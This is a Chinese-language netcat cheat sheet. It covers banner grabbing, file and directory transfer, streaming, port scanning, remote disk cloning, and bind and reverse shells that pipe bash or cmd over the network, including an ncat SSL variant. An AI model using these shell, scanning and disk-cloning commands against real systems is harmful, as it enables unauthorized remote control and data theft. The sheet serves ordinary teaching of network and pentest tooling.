网络工具中的瑞士军刀-NETCAT

NC——TELNET / BANNER

  • nc -nv 1.1.1.1 110

NC——传输文本信息

  • nc -l -p 4444
  • nc -nv 1.1.1.1 4444
    审计时,输出到其它计算机
    1
    2
    nc -l -p 333 > ps.txt
    ps -aux|nc -nv 10.1.1.12 333 -q 1

NC——传输文件/目录

  • 传输文件
    • A:nc -lp 333 > 1.mp4
    • B:nc -nv 1.1.1.1 333 < 1.mp4 -q 1
    • A:nc -lp 333 < 1.mp4 -q 1
    • B:nc -vn 333 > 1.mp4
  • 传输目录
    • A:tar -cvf -music/ | nc -lp 333 -q 1
    • B:nc -nv 1.1.1.1 333 | tar -xvf -
  • 传输加密文件
    • A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
    • B:mcrypt -flush -Fbqd -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1

NC——流媒体服务

  • A:cat 1.mp4 | nc -lp 333
  • B:nc -nv 1.1.1.1 333 |mplayer -vo x11 -cache 3000 -

NC——端口扫描

  • nc -nvz 1.1.1.1 -65535 TCP端口
  • nc -nvzu 1.1.1.1 1-1024 UDP端口

NC——远程硬盘克隆

  • nc -lp 333|dd of=/dev/sda
  • dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1

NC——远程控制

  • 正向:
    • A:nc -lp 333 -c bash
    • B:nc -nv 1.1.1.1 333
  • 反向:
    • A:nc -lp 333
    • B:nc -nv 1.1.1.1 333 -c bash
  • 注:Windows把bash改成cmd

NC——NCAT

  • NC缺乏加密和身份验证的能力
  • Ncat
  • A:ncat ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl
  • B:ncat -nv 1.1.1.1 333 --ssl
  • 不同平台/系统 nc参数功能不尽相同